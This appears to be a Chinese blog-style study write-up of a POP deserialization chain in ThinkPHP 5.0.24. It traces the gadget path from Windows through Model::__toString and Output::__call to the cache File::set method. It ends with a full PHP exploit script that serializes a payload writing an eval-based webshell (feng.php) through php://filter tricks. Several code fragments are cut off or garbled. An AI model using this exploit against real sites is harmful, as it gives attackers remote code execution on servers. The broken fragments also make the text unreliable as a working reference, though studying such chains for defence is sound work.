Thinkphp5.0.24 pop链子学习

下个断点，很容易看清其走向。

 然后便会发现1.txt已经被删除。

恶意文件上传

file_exists搭配对象可以跳到__toString。

 在Model.php的__toString中，进入tojson然后跟进，到toArray()。

    public function __toString()    {        return $this->toJson();    }    public function toJson($options = JSON_UNESCAPED_UNICODE)    {        return json_encode($this->toArray(), $options);    }

 三处存在__call漏洞可能

$item[$key] = $relation->append([$attr])->toArray();$bindAttr = $modelRelation->getBindAttr();$item[$key] = $value ? $value->getAttr($attr) : null;

找一下可控变量，$value可控，往上边跟一下。

$value = $this->getRelationData($modelRelation);

$value是在getRelationData中返还，跟进看一下。

$value = $this->parent;

看一下parent是否可控，发现可控，看一下if条件。

三个条件：

$this->parent!$modelRelation->isSelfRelation()get_class($modelRelation->getModel()) == get_class($this->parent)

第一个：parent可控。

第二个：

 可控

第三个：跟进getModel函数

 query可控，然后又调用了getModel,再跟进，在thinkphp\library\think\db\Query.php中发现getModel方法。

 返还model，参数可控。

绕过getRelationData方法中的三个条件

三个条件都可以满足，可以进入if条件。

再看下边代码中的$modelRelation参数。

$value = $this->getRelationData($modelRelation);

$modelRelation被relation控制，relation被Loader::parseName控制，跟一下。

发现其只是一个大小写变化，不会改变name参数，因为$name可控，所以$relation可控。

if (method_exists($this, $relation)) {               $modelRelation = $this->$relation();               $value         = $this->getRelationData($modelRelation);

想进入if语句，需要满足这个method_exists，则需要将$relation设定为$this中存在的方法，relation可以控制，this指的是Model这个类，看一起其中哪一个方法返回参数可以直接控制。

发现了getError方法，且返回的error参数可以直接控制。

error参数的值刚好直接可以返还给$modelRelation。

$modelRelation = $this->$relation();

这里的relation()可以直接当作getError()，返还error的值，所以$modelRelation=$error

想进入改语句，需要先解决前边几个if条件。

if (method_exists($modelRelation, 'getBindAttr'))$bindAttr = $modelRelation->getBindAttr()if ($bindAttr)

下边的一个if语句刚好就是modelRelation的getBindAttr方法返回的值，跟一下getBindAttr。

在OneToOne.php发现该方法，并且bindAttr可控，第二个if条件也可以过了。

    public function getBindAttr()    {        return $this->bindAttr;    }

OneToOne是一个抽象类，且OneToOne类是Relation类的派生类，然后找一下谁继承了OneToOne，找到了class HasOne extends OneToOne，HasOne继承了OneToOne。可以直接让让$modelRelation的值为HasOne，可以满足getRelationData方法中if第三个条件的getModel方法，并且其中也有bindAttr可控。

然后进入if (isset($this->data[$key]))的else条件便可以调用__call方法。

调用__call之后的操作

public function __call($method, $args)    {        if (in_array($method, $this->styles)) {            array_unshift($args, $method);            return call_user_func_array([$this, 'block'], $args);        }        if ($this->handle && method_exists($this->handle, $method)) {            return call_user_func_array([$this->handle, $method], $args);        } else {            throw new Exception('method not exists:' . __CLASS__ . '->' . $method);        }    }}

call函数中in_array的$method, $this->styles两个参数可控，可以进入if语句，然后可以实现block方法，跟进一下block。

直接到了write方法，发现handel可控，找一个存在可控write方法的类利用。 

 $this->handler可控，再找一下可以利用的set方法。

在thinkphp\library\think\cache\driver\File.php中发现set且存在一个写入文件的操作。

public function set($name, $value, $expire = null)    {        if (is_null($expire)) {            $expire = $this->options['expire'];        }        if ($expire instanceof \DateTime) {            $expire = $expire->getTimestamp() - time();        }        $filename = $this->getCacheKey($name, true);        if ($this->tag && !is_file($filename)) {            $first = true;        }        $data = serialize($value);        if ($this->options['data_compress'] && function_exists('gzcompress')) {            //数据压缩            $data = gzcompress($data, 3);        }        $data   = "\n" . $data;        $result = file_put_contents($filename, $data);        if ($result) {            isset($first) && $this->setTagItem($filename);            clearstatcache();            return true;        } else {            return false;        }    }

首先看一下filename和data是否可控。

$filename = $this->getCacheKey($name, true);

filename由getCacheKey决定，跟一下getCacheKey。

$filename = $this->options['path'] . $name . '.php';

filename类型后缀为php，前边的options['path']和name可控。

 很明显可以看出$data=$value=$sessData=$newline=ture,所以data不可控，直接这样写入文件行不通，但在后边的setTagItem方法中，再一次调用了set方法。

    protected function setTagItem($name)    {        if ($this->tag) {            $key       = 'tag_' . md5($this->tag);            $this->tag = null;            if ($this->has($key)) {                $value   = explode(',', $this->get($key));                $value[] = $name;                $value   = implode(',', array_unique($value));            } else {                $value = $name;            }            $this->set($key, $value, 0);        }    }

此时$key和$value均可控。

利用php为协议来绕过exit();?>

利用php://filter中string.rot13过滤器去除”exit”。string.rot13的特性是编码和解码都是自身完成，利用这一特性可以去除exit。在经过rot13编码后会变成，前提是PHP不开启short_open_tag。

\n" . $content1;file_put_contents($filename,$data);?>

\n" . $content;echo $data;file_put_contents($filename,$data);?>

files = [];    }}

$bindAttr = $modelRelation->getBindAttr();

files = [new Pivot()];    }}namespace think;use think\model\relation\HasOne;use think\console\Output;use think\db\Query;abstract class Model{    protected $append = [];    protected $error;    public $parent;    protected $query;    function __construct()    {        $this->append=['getError'];        $this->error=new HasOne();        $this->query=new Query();        $this->parent=new Output();    }}namespace think\model;use think\Model;class Pivot extends Model{}namespace think\model\relation;use think\model\Relation;abstract class OneToOne extends Relation{ # OneToOne抽象类    function __construct(){        parent::__construct();    }}// HasOneclass HasOne extends OneToOne{    protected $bindAttr = [];    function __construct(){        parent::__construct();        $this->bindAttr = ["no","123"];    }}namespace think\model;use think\db\Query;abstract class Relation{    protected $selfRelation;    protected $query;    function __construct(){        $this->selfRelation = false;        $this->query= new Query();    }}namespace think\db;use think\console\Output;class Query{    protected $model;    function __construct(){        $this->model = new Output(); //让其与parent一直，通过getRelationData的第三个条件    }}namespace think\console;use think\session\driver\Memcache;class Output{    private $handle = null;    protected $styles = [];    function __construct()    {        $this->styles = ['getAttr'];        $this->handle=new Memcache();    }}namespace think\session\driver;use think\cache\driver\File;class Memcache{    protected $handler = null;    function __construct()    {        $this->handler = new File();    }}namespace think\cache\driver;class File{    protected $options = [];    protected $tag;    function __construct()    {        $this->options = [            'expire' => 0,            'cache_subdir' => false,            'prefix' => '',            'path'=>'php://filter/convert.iconv.utf-8.utf-7|convert.base64-decode/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydmZW5nJ10pOz8+IA==/../feng.php',            'data_compress' => false,        ];        $this->tag = true;    }    public function Getfilename()    {        $name = md5('tag_' . md5($this->tag));        $filename = $this->options['path'];        $pos = strpos($filename, "/../");        $filename = urlencode(substr($filename, $pos + strlen("/../")));        return $filename . $name . ".php";    }}use think\process\pipes\Windows;echo base64_encode(serialize(new Windows()));echo "\n";$a = new File();echo $a->Getfilename();